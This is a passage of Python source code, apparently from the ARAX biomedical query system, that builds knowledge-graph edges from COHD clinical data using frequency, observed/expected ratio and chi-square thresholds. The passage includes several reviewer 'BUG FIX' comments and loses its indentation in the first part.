swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "paired_concept_frequency", value)
else:
continue
source_dict[source_preferred_key] = source_qnode_key
target_dict[target_preferred_key] = target_qnode_key
# Finally add the current edge to our answer knowledge graph
final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
# Add the nodes to our answer knowledge graph
if len(source_dict) != 0:
for source_preferred_key in source_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
if len(target_dict) != 0:
for target_preferred_key in target_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
if count != 0:
log.info(f"The average threshold based on {COHD_method_percentile}th percentile of paired concept frequency is {threshold/count}")
return final_kg
elif source_qnode_omop_ids is not None:
source_dict = dict()
target_dict = dict()
new_edge = dict()
average_threshold = 0
count = 0
for source_preferred_key in source_qnode_omop_ids:
if source_qnode.category is None:
pass
else:
if self.synonymizer.get_canonical_curies(source_preferred_key)[source_preferred_key]['preferred_category'] == source_qnode.category:
pass
else:
log.warning(f"The preferred type of source preferred id '{source_preferred_key}' can't match to the given source type '{source_qnode.category}''")
continue
if len(source_qnode_omop_ids[source_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
elif len(self.cohdindex.get_paired_concept_freq(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept frequency was found from COHD database for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
else:
pass
new_edge[source_preferred_key] = dict()
threshold = np.percentile([row['concept_frequency'] for row in self.cohdindex.get_paired_concept_freq(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3) if row['concept_frequency'] != 0], COHD_method_percentile)
average_threshold = average_threshold + threshold
count = count + 1
freq_data_list = [row for row in self.cohdindex.get_paired_concept_freq(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3) if row['concept_frequency'] >= threshold]
for freq_data in freq_data_list:
if target_qnode.category is None:
preferred_target_list = self.cohdindex.get_curies_from_concept_id(freq_data['concept_id_2'])
else:
preferred_target_list = [preferred_target_curie for preferred_target_curie in self.cohdindex.get_curies_from_concept_id(freq_data['concept_id_2']) if self.synonymizer.get_canonical_curies(preferred_target_curie)[preferred_target_curie]['preferred_category'] == target_qnode.category]
for target_preferred_key in preferred_target_list:
if target_preferred_key not in new_edge[source_preferred_key]:
new_edge[source_preferred_key][target_preferred_key] = freq_data['concept_frequency']
else:
if freq_data['concept_frequency'] > new_edge[source_preferred_key][target_preferred_key]:
new_edge[source_preferred_key][target_preferred_key] = freq_data['concept_frequency']
if len(new_edge[source_preferred_key]) != 0:
for target_preferred_key in new_edge[source_preferred_key]:
swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "paired_concept_frequency", new_edge[source_preferred_key][target_preferred_key])
source_dict[source_preferred_key] = source_qnode_key
target_dict[target_preferred_key] = target_qnode_key
# Finally add the current edge to our answer knowledge graph
final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
# Add the nodes to our answer knowledge graph
if len(source_dict) != 0:
for source_preferred_key in source_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
if len(target_dict) != 0:
for target_preferred_key in target_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
if count != 0:
log.info(f"The average threshold based on {COHD_method_percentile}th percentile of paired concept frequency is {threshold/count}")
return final_kg
else:
source_dict = dict()
target_dict = dict()
new_edge = dict()
average_threshold = 0
count = 0
for target_preferred_key in target_qnode_omop_ids:
if target_qnode.category is None:
pass
else:
if self.synonymizer.get_canonical_curies(target_preferred_key)[target_preferred_key]['preferred_category'] == target_qnode.category:
pass
else:
continue
if len(target_qnode_omop_ids[target_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
elif len(self.cohdindex.get_paired_concept_freq(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept frequency was found from COHD database for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
else:
pass
new_edge[target_preferred_key] = dict()
threshold = np.percentile([row['concept_frequency'] for row in self.cohdindex.get_paired_concept_freq(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3) if row['concept_frequency'] != 0], COHD_method_percentile)
average_threshold = average_threshold + threshold
count = count + 1
freq_data_list = [row for row in self.cohdindex.get_paired_concept_freq(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3) if row['concept_frequency'] >= threshold]
for freq_data in freq_data_list:
if source_qnode.category is None:
preferred_source_list = self.cohdindex.get_curies_from_concept_id(freq_data['concept_id_2'])
else:
preferred_source_list = [preferred_source_curie for preferred_source_curie in self.cohdindex.get_curies_from_concept_id(freq_data['concept_id_2']) if self.synonymizer.get_canonical_curies(preferred_source_curie)[preferred_source_curie]['preferred_category'] == source_qnode.category]
for source_preferred_key in preferred_source_list:
if source_preferred_key not in new_edge[target_preferred_key]:
new_edge[target_preferred_key][source_preferred_key] = freq_data['concept_frequency']
else:
if freq_data['concept_frequency'] > new_edge[target_preferred_key][source_preferred_key]:
new_edge[target_preferred_key][source_preferred_key] = freq_data['concept_frequency']
if len(new_edge[target_preferred_key]) != 0:
for source_preferred_key in new_edge[target_preferred_key]:
swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "paired_concept_frequency", new_edge[target_preferred_key][source_preferred_key])
source_dict[source_preferred_key] = source_qnode_key
target_dict[target_preferred_key] = target_qnode_key
# Finally add the current edge to our answer knowledge graph
final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
# Add the nodes to our answer knowledge graph
if len(source_dict) != 0:
for source_preferred_key in source_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
if len(target_dict) != 0:
for target_preferred_key in target_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
if count != 0:
log.info(f"The average threshold based on {COHD_method_percentile}th percentile of paired concept frequency is {threshold/count}")
return final_kg
def _answer_query_using_COHD_observed_expected_ratio(self, query_graph: QueryGraph, COHD_method_percentile: float, log: ARAXResponse) -> QGOrganizedKnowledgeGraph:
    """Expand the single qedge in *query_graph* using COHD's ln(observed/expected) ratio.

    Curies on each qnode are mapped to OMOP concept ids; a candidate edge is kept only
    when its best ln_ratio reaches a per-concept threshold taken at
    *COHD_method_percentile* of that concept's ln_ratio distribution (-inf entries are
    dropped before the percentile is computed).  Returns the answer knowledge graph;
    returns an empty graph after logging when the query is malformed or lookups fail.
    """
    qedge_key = next(qedge_key for qedge_key in query_graph.edges)
    log.debug(f"Processing query results for edge {qedge_key} by using natural logarithm of observed expected ratio")
    final_kg = QGOrganizedKnowledgeGraph()
    # extract information from the QueryGraph
    qedge = query_graph.edges[qedge_key]
    source_qnode_key = qedge.subject
    target_qnode_key = qedge.object
    source_qnode = query_graph.nodes[source_qnode_key]
    target_qnode = query_graph.nodes[target_qnode_key]
    # check if both ends of edge have no curie
    if (source_qnode.id is None) and (target_qnode.id is None):
        log.error(f"Both ends of edge {qedge_key} are None", error_code="BadEdge")
        return final_kg
    # Convert curie ids to OMOP ids
    if source_qnode.id is not None:
        source_qnode_omop_ids = self._get_omop_id_from_curies(source_qnode_key, query_graph, log)
    else:
        source_qnode_omop_ids = None
    if log.status != 'OK':
        return final_kg
    if target_qnode.id is not None:
        target_qnode_omop_ids = self._get_omop_id_from_curies(target_qnode_key, query_graph, log)
    else:
        target_qnode_omop_ids = None
    if log.status != 'OK':
        return final_kg
    # expand edges according to the OMOP id pairs
    if (source_qnode_omop_ids is None) and (target_qnode_omop_ids is None):
        return final_kg
    elif (source_qnode_omop_ids is not None) and (target_qnode_omop_ids is not None):
        # Both qnodes carry curies: evaluate every source/target curie pair.
        source_dict = dict()
        target_dict = dict()
        average_threshold = 0
        count = 0
        for (source_preferred_key, target_preferred_key) in itertools.product(list(source_qnode_omop_ids.keys()), list(target_qnode_omop_ids.keys())):
            # When a category constraint exists, keep only pairs whose preferred categories match it.
            if source_qnode.category is None and target_qnode.category is None:
                pass
            else:
                if self.synonymizer.get_canonical_curies(source_preferred_key)[source_preferred_key]['preferred_category'] == source_qnode.category:
                    pass
                else:
                    continue
                if self.synonymizer.get_canonical_curies(target_preferred_key)[target_preferred_key]['preferred_category'] == target_qnode.category:
                    pass
                else:
                    continue
            if len(source_qnode_omop_ids[source_preferred_key]) == 0:
                log.warning(f"No OMOP concept id was found for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
                continue
            elif len(self.cohdindex.get_obs_exp_ratio(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3)) == 0:
                log.warning(f"No paired concept ids was found from COHD database for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
                continue
            else:
                pass
            if len(target_qnode_omop_ids[target_preferred_key]) == 0:
                log.warning(f"No OMOP concept id was found for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
                continue
            elif len(self.cohdindex.get_obs_exp_ratio(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3)) == 0:
                log.warning(f"No paired concept ids was found from COHD database for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
                continue
            else:
                pass
            value = float("-inf")
            threshold1 = np.percentile([row['ln_ratio'] for row in self.cohdindex.get_obs_exp_ratio(concept_id_1=source_qnode_omop_ids[source_preferred_key], domain="", dataset_id=3) if row['ln_ratio'] != float("-inf")], COHD_method_percentile)  # calculate the percentile after removing the extreme value e.g. -inf
            threshold2 = np.percentile([row['ln_ratio'] for row in self.cohdindex.get_obs_exp_ratio(concept_id_1=target_qnode_omop_ids[target_preferred_key], domain="", dataset_id=3) if row['ln_ratio'] != float("-inf")], COHD_method_percentile)  # calculate the percentile after removing the extreme value e.g. -inf
            threshold = min(threshold1, threshold2)  # pick the minimum one for threshold
            average_threshold = average_threshold + threshold
            count = count + 1
            omop_pairs = [f"{omop1}_{omop2}" for (omop1, omop2) in itertools.product(source_qnode_omop_ids[source_preferred_key], target_qnode_omop_ids[target_preferred_key])]
            if len(omop_pairs) != 0:
                res = self.cohdindex.get_obs_exp_ratio(concept_id_pair=omop_pairs, domain="", dataset_id=3)  # use the hierarchical dataset
                if len(res) != 0:
                    # assumes results are sorted best-first, so row 0 holds the maximum ln_ratio — TODO confirm
                    maximum_ln_ratio = res[0]['ln_ratio']
                    value = maximum_ln_ratio
            # value stays -inf when no pair data was found, so this also filters those out
            if value >= threshold:
                swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "ln_observed_expected_ratio", value)
            else:
                continue
            source_dict[source_preferred_key] = source_qnode_key
            target_dict[target_preferred_key] = target_qnode_key
            # Finally add the current edge to our answer knowledge graph
            final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
        # Add the nodes to our answer knowledge graph
        if len(source_dict) != 0:
            for source_preferred_key in source_dict:
                swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
                final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
        if len(target_dict) != 0:
            for target_preferred_key in target_dict:
                swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
                final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
        if count != 0:
            # BUG FIX: report the accumulated average, not the last loop iteration's threshold
            log.info(f"The average threshold based on {COHD_method_percentile}th percentile of natural logarithm of observed expected ratio is {average_threshold/count}")
        return final_kg
    elif source_qnode_omop_ids is not None:
        # Only the source qnode carries curies: walk COHD neighbors of each source concept.
        source_dict = dict()
        target_dict = dict()
        new_edge = dict()
        average_threshold = 0
        count = 0
        for source_preferred_key in source_qnode_omop_ids:
            if source_qnode.category is None:
                pass
            else:
                if self.synonymizer.get_canonical_curies(source_preferred_key)[source_preferred_key]['preferred_category'] == source_qnode.category:
                    pass
                else:
                    continue
            if len(source_qnode_omop_ids[source_preferred_key]) == 0:
                log.warning(f"No OMOP concept id was found for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
                continue
            elif len(self.cohdindex.get_obs_exp_ratio(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3)) == 0:
                log.warning(f"No paired concept frequency was found from COHD database for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
                continue
            else:
                pass
            new_edge[source_preferred_key] = dict()
            threshold = np.percentile([row['ln_ratio'] for row in self.cohdindex.get_obs_exp_ratio(concept_id_1=source_qnode_omop_ids[source_preferred_key], domain="", dataset_id=3) if row['ln_ratio'] != float("-inf")], COHD_method_percentile)
            average_threshold = average_threshold + threshold
            count = count + 1
            ln_ratio_data_list = [row for row in self.cohdindex.get_obs_exp_ratio(concept_id_1=source_qnode_omop_ids[source_preferred_key], domain="", dataset_id=3) if row['ln_ratio'] >= threshold]
            for ln_ratio_data in ln_ratio_data_list:
                if target_qnode.category is None:
                    preferred_target_list = self.cohdindex.get_curies_from_concept_id(ln_ratio_data['concept_id_2'])
                else:
                    preferred_target_list = [preferred_target_curie for preferred_target_curie in self.cohdindex.get_curies_from_concept_id(ln_ratio_data['concept_id_2']) if self.synonymizer.get_canonical_curies(preferred_target_curie)[preferred_target_curie]['preferred_category'] == target_qnode.category]
                for target_preferred_key in preferred_target_list:
                    # Keep the best (largest) ln_ratio seen for each target curie.
                    if target_preferred_key not in new_edge[source_preferred_key]:
                        new_edge[source_preferred_key][target_preferred_key] = ln_ratio_data['ln_ratio']
                    else:
                        if ln_ratio_data['ln_ratio'] > new_edge[source_preferred_key][target_preferred_key]:
                            new_edge[source_preferred_key][target_preferred_key] = ln_ratio_data['ln_ratio']
            if len(new_edge[source_preferred_key]) != 0:
                for target_preferred_key in new_edge[source_preferred_key]:
                    swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "ln_observed_expected_ratio", new_edge[source_preferred_key][target_preferred_key])
                    source_dict[source_preferred_key] = source_qnode_key
                    target_dict[target_preferred_key] = target_qnode_key
                    # Finally add the current edge to our answer knowledge graph
                    final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
        # Add the nodes to our answer knowledge graph
        if len(source_dict) != 0:
            for source_preferred_key in source_dict:
                swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
                final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
        if len(target_dict) != 0:
            for target_preferred_key in target_dict:
                swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
                final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
        if count != 0:
            # BUG FIX: report the accumulated average, not the last loop iteration's threshold
            log.info(f"The average threshold based on {COHD_method_percentile}th percentile of natural logarithm of observed expected ratio is {average_threshold/count}")
        return final_kg
    else:
        # Only the target qnode carries curies: mirror of the source-only branch.
        source_dict = dict()
        target_dict = dict()
        new_edge = dict()
        average_threshold = 0
        count = 0
        for target_preferred_key in target_qnode_omop_ids:
            if target_qnode.category is None:
                pass
            else:
                if self.synonymizer.get_canonical_curies(target_preferred_key)[target_preferred_key]['preferred_category'] == target_qnode.category:
                    pass
                else:
                    continue
            if len(target_qnode_omop_ids[target_preferred_key]) == 0:
                log.warning(f"No OMOP concept id was found for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
                continue
            # BUG FIX: this existence check used get_paired_concept_freq; every sibling
            # check in this method uses get_obs_exp_ratio, so use it here too.
            elif len(self.cohdindex.get_obs_exp_ratio(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3)) == 0:
                log.warning(f"No paired concept frequency was found from COHD database for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
                continue
            else:
                pass
            new_edge[target_preferred_key] = dict()
            threshold = np.percentile([row['ln_ratio'] for row in self.cohdindex.get_obs_exp_ratio(concept_id_1=target_qnode_omop_ids[target_preferred_key], domain="", dataset_id=3) if row['ln_ratio'] != float("-inf")], COHD_method_percentile)
            average_threshold = average_threshold + threshold
            count = count + 1
            ln_ratio_data_list = [row for row in self.cohdindex.get_obs_exp_ratio(concept_id_1=target_qnode_omop_ids[target_preferred_key], domain="", dataset_id=3) if row['ln_ratio'] >= threshold]
            for ln_ratio_data in ln_ratio_data_list:
                if source_qnode.category is None:
                    preferred_source_list = self.cohdindex.get_curies_from_concept_id(ln_ratio_data['concept_id_2'])
                else:
                    preferred_source_list = [preferred_source_curie for preferred_source_curie in self.cohdindex.get_curies_from_concept_id(ln_ratio_data['concept_id_2']) if self.synonymizer.get_canonical_curies(preferred_source_curie)[preferred_source_curie]['preferred_category'] == source_qnode.category]
                for source_preferred_key in preferred_source_list:
                    # Keep the best (largest) ln_ratio seen for each source curie.
                    if source_preferred_key not in new_edge[target_preferred_key]:
                        new_edge[target_preferred_key][source_preferred_key] = ln_ratio_data['ln_ratio']
                    else:
                        if ln_ratio_data['ln_ratio'] > new_edge[target_preferred_key][source_preferred_key]:
                            new_edge[target_preferred_key][source_preferred_key] = ln_ratio_data['ln_ratio']
            if len(new_edge[target_preferred_key]) != 0:
                for source_preferred_key in new_edge[target_preferred_key]:
                    swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "ln_observed_expected_ratio", new_edge[target_preferred_key][source_preferred_key])
                    source_dict[source_preferred_key] = source_qnode_key
                    target_dict[target_preferred_key] = target_qnode_key
                    # Finally add the current edge to our answer knowledge graph
                    final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
        # Add the nodes to our answer knowledge graph
        if len(source_dict) != 0:
            for source_preferred_key in source_dict:
                swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
                final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
        if len(target_dict) != 0:
            for target_preferred_key in target_dict:
                swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
                final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
        if count != 0:
            # BUG FIX: report the accumulated average, not the last loop iteration's threshold
            log.info(f"The average threshold based on {COHD_method_percentile}th percentile of natural logarithm of observed expected ratio is {average_threshold/count}")
        return final_kg
def _answer_query_using_COHD_chi_square(self, query_graph: QueryGraph, COHD_method_percentile: float, log: ARAXResponse) -> QGOrganizedKnowledgeGraph:
    """Expand the single qedge in *query_graph* using COHD chi-square p-values.

    Curies on each qnode are mapped to OMOP concept ids; a candidate edge is kept only
    when its best (smallest) p-value passes a per-concept threshold derived from the
    concept's p-value distribution (zero p-values are dropped before the percentile is
    computed).  Returns the answer knowledge graph; returns an empty graph after
    logging when the query is malformed or lookups fail.
    """
    qedge_key = next(qedge_key for qedge_key in query_graph.edges)
    log.debug(f"Processing query results for edge {qedge_key} by using chi square pvalue")
    final_kg = QGOrganizedKnowledgeGraph()
    # extract information from the QueryGraph
    qedge = query_graph.edges[qedge_key]
    source_qnode_key = qedge.subject
    target_qnode_key = qedge.object
    source_qnode = query_graph.nodes[source_qnode_key]
    target_qnode = query_graph.nodes[target_qnode_key]
    # check if both ends of edge have no curie
    if (source_qnode.id is None) and (target_qnode.id is None):
        log.error(f"Both ends of edge {qedge_key} are None", error_code="BadEdge")
        return final_kg
    # Convert curie ids to OMOP ids
    if source_qnode.id is not None:
        source_qnode_omop_ids = self._get_omop_id_from_curies(source_qnode_key, query_graph, log)
    else:
        source_qnode_omop_ids = None
    if log.status != 'OK':
        return final_kg
    if target_qnode.id is not None:
        target_qnode_omop_ids = self._get_omop_id_from_curies(target_qnode_key, query_graph, log)
    else:
        target_qnode_omop_ids = None
    if log.status != 'OK':
        return final_kg
    # expand edges according to the OMOP id pairs
    if (source_qnode_omop_ids is None) and (target_qnode_omop_ids is None):
        return final_kg
    elif (source_qnode_omop_ids is not None) and (target_qnode_omop_ids is not None):
        # Both qnodes carry curies: evaluate every source/target curie pair.
        source_dict = dict()
        target_dict = dict()
        average_threshold = 0
        count = 0
        for (source_preferred_key, target_preferred_key) in itertools.product(list(source_qnode_omop_ids.keys()), list(target_qnode_omop_ids.keys())):
            # When a category constraint exists, keep only pairs whose preferred categories match it.
            if source_qnode.category is None and target_qnode.category is None:
                pass
            else:
                if self.synonymizer.get_canonical_curies(source_preferred_key)[source_preferred_key]['preferred_category'] == source_qnode.category:
                    pass
                else:
                    continue
                if self.synonymizer.get_canonical_curies(target_preferred_key)[target_preferred_key]['preferred_category'] == target_qnode.category:
                    pass
                else:
                    continue
            if len(source_qnode_omop_ids[source_preferred_key]) == 0:
                log.warning(f"No OMOP concept id was found for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
                continue
            elif len(self.cohdindex.get_obs_exp_ratio(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3)) == 0:
                log.warning(f"No paired concept ids was found from COHD database for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
                continue
            else:
                pass
            if len(target_qnode_omop_ids[target_preferred_key]) == 0:
                log.warning(f"No OMOP concept id was found for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
                continue
            elif len(self.cohdindex.get_obs_exp_ratio(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3)) == 0:
                log.warning(f"No paired concept ids was found from COHD database for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
                continue
            else:
                pass
            value = float("inf")
            # NOTE(review): unlike the single-sided branches below, this branch takes the
            # percentile directly rather than (100 - percentile) — confirm that is intended
            # for a p-value (smaller-is-better) statistic.
            threshold1 = np.percentile([row['p-value'] for row in self.cohdindex.get_chi_square(concept_id_1=source_qnode_omop_ids[source_preferred_key], domain="", dataset_id=3) if row['p-value'] != 0], COHD_method_percentile)  # calculate the percentile after removing the extreme value e.g. 0
            threshold2 = np.percentile([row['p-value'] for row in self.cohdindex.get_chi_square(concept_id_1=target_qnode_omop_ids[target_preferred_key], domain="", dataset_id=3) if row['p-value'] != 0], COHD_method_percentile)  # calculate the percentile after removing the extreme value e.g. 0
            threshold = max(threshold1, threshold2)  # pick the maximum one for threshold
            average_threshold = average_threshold + threshold
            count = count + 1
            omop_pairs = [f"{omop1}_{omop2}" for (omop1, omop2) in itertools.product(source_qnode_omop_ids[source_preferred_key], target_qnode_omop_ids[target_preferred_key])]
            if len(omop_pairs) != 0:
                # BUG FIX: attribute is self.cohdindex (lowercase); self.cohdIndex raised AttributeError
                res = self.cohdindex.get_chi_square(concept_id_pair=omop_pairs, domain="", dataset_id=3)  # use the hierarchical dataset
                if len(res) != 0:
                    # assumes results are sorted most-significant first, so row 0 holds the minimum p-value — TODO confirm
                    minimum_pvalue = res[0]['p-value']
                    value = minimum_pvalue
            # value stays +inf when no pair data was found, so this also filters those out
            if value <= threshold:
                swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "chi_square_pvalue", value)
            else:
                continue
            source_dict[source_preferred_key] = source_qnode_key
            target_dict[target_preferred_key] = target_qnode_key
            # Finally add the current edge to our answer knowledge graph
            final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
        # Add the nodes to our answer knowledge graph
        if len(source_dict) != 0:
            for source_preferred_key in source_dict:
                swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
                final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
        if len(target_dict) != 0:
            for target_preferred_key in target_dict:
                swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
                final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
        if count != 0:
            # BUG FIX: report the accumulated average, not the last loop iteration's threshold
            log.info(f"The average threshold based on {COHD_method_percentile}th percentile of chi square pvalue is {average_threshold/count}")
        return final_kg
    elif source_qnode_omop_ids is not None:
        # Only the source qnode carries curies: walk COHD neighbors of each source concept.
        source_dict = dict()
        target_dict = dict()
        new_edge = dict()
        average_threshold = 0
        count = 0
        for source_preferred_key in source_qnode_omop_ids:
            if source_qnode.category is None:
                pass
            else:
                if self.synonymizer.get_canonical_curies(source_preferred_key)[source_preferred_key]['preferred_category'] == source_qnode.category:
                    pass
                else:
                    continue
            if len(source_qnode_omop_ids[source_preferred_key]) == 0:
                log.warning(f"No OMOP concept id was found for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
                continue
            elif len(self.cohdindex.get_obs_exp_ratio(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3)) == 0:
                log.warning(f"No paired concept frequency was found from COHD database for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
                continue
            else:
                pass
            new_edge[source_preferred_key] = dict()
            # For p-values the significant tail is the low one, hence (100 - percentile).
            threshold = np.percentile([row['p-value'] for row in self.cohdindex.get_chi_square(concept_id_1=source_qnode_omop_ids[source_preferred_key], domain="", dataset_id=3) if row['p-value'] != 0], (100 - COHD_method_percentile))
            average_threshold = average_threshold + threshold
            count = count + 1
            pvalue_data_list = [row for row in self.cohdindex.get_chi_square(concept_id_1=source_qnode_omop_ids[source_preferred_key], domain="", dataset_id=3) if row['p-value'] <= threshold]
            for pvalue_data in pvalue_data_list:
                if target_qnode.category is None:
                    preferred_target_list = self.cohdindex.get_curies_from_concept_id(pvalue_data['concept_id_2'])
                else:
                    preferred_target_list = [preferred_target_curie for preferred_target_curie in self.cohdindex.get_curies_from_concept_id(pvalue_data['concept_id_2']) if self.synonymizer.get_canonical_curies(preferred_target_curie)[preferred_target_curie]['preferred_category'] == target_qnode.category]
                for target_preferred_key in preferred_target_list:
                    # Keep the best (smallest) p-value seen for each target curie.
                    if target_preferred_key not in new_edge[source_preferred_key]:
                        new_edge[source_preferred_key][target_preferred_key] = pvalue_data['p-value']
                    else:
                        if pvalue_data['p-value'] < new_edge[source_preferred_key][target_preferred_key]:
                            new_edge[source_preferred_key][target_preferred_key] = pvalue_data['p-value']
            if len(new_edge[source_preferred_key]) != 0:
                for target_preferred_key in new_edge[source_preferred_key]:
                    swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "chi_square_pvalue", new_edge[source_preferred_key][target_preferred_key])
                    source_dict[source_preferred_key] = source_qnode_key
                    target_dict[target_preferred_key] = target_qnode_key
                    # Finally add the current edge to our answer knowledge graph
                    final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
        # Add the nodes to our answer knowledge graph
        if len(source_dict) != 0:
            for source_preferred_key in source_dict:
                swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
                final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
        if len(target_dict) != 0:
            for target_preferred_key in target_dict:
                swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
                final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
        if count != 0:
            # BUG FIX: report the accumulated average, not the last loop iteration's threshold
            log.info(f"The average threshold based on {COHD_method_percentile}th percentile of chi square pvalue is {average_threshold/count}")
        return final_kg
    else:
        # Only the target qnode carries curies: mirror of the source-only branch.
        source_dict = dict()
        target_dict = dict()
        new_edge = dict()
        average_threshold = 0
        count = 0
        for target_preferred_key in target_qnode_omop_ids:
            if target_qnode.category is None:
                pass
            else:
                if self.synonymizer.get_canonical_curies(target_preferred_key)[target_preferred_key]['preferred_category'] == target_qnode.category:
                    pass
                else:
                    continue
            if len(target_qnode_omop_ids[target_preferred_key]) == 0:
                log.warning(f"No OMOP concept id was found for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
                continue
            # BUG FIX: this existence check used get_paired_concept_freq; every sibling
            # check in this method uses get_obs_exp_ratio, so use it here too.
            elif len(self.cohdindex.get_obs_exp_ratio(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3)) == 0:
                log.warning(f"No paired concept frequency was found from COHD database for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
                continue
            else:
                pass
            new_edge[target_preferred_key] = dict()
            # BUG FIX: use (100 - percentile) like the symmetric source-only branch —
            # the significant p-value tail is the low one.
            threshold = np.percentile([row['p-value'] for row in self.cohdindex.get_chi_square(concept_id_1=target_qnode_omop_ids[target_preferred_key], domain="", dataset_id=3) if row['p-value'] != 0], (100 - COHD_method_percentile))
            average_threshold = average_threshold + threshold
            count = count + 1
            pvalue_data_list = [row for row in self.cohdindex.get_chi_square(concept_id_1=target_qnode_omop_ids[target_preferred_key], domain="", dataset_id=3) if row['p-value'] <= threshold]
            for pvalue_data in pvalue_data_list:
                if source_qnode.category is None:
                    preferred_source_list = self.cohdindex.get_curies_from_concept_id(pvalue_data['concept_id_2'])
                else:
                    preferred_source_list = [preferred_source_curie for preferred_source_curie in self.cohdindex.get_curies_from_concept_id(pvalue_data['concept_id_2']) if self.synonymizer.get_canonical_curies(preferred_source_curie)[preferred_source_curie]['preferred_category'] == source_qnode.category]
                for source_preferred_key in preferred_source_list:
                    # Keep the best (smallest) p-value seen for each source curie.
                    if source_preferred_key not in new_edge[target_preferred_key]:
                        new_edge[target_preferred_key][source_preferred_key] = pvalue_data['p-value']
                    else:
                        if pvalue_data['p-value'] < new_edge[target_preferred_key][source_preferred_key]:
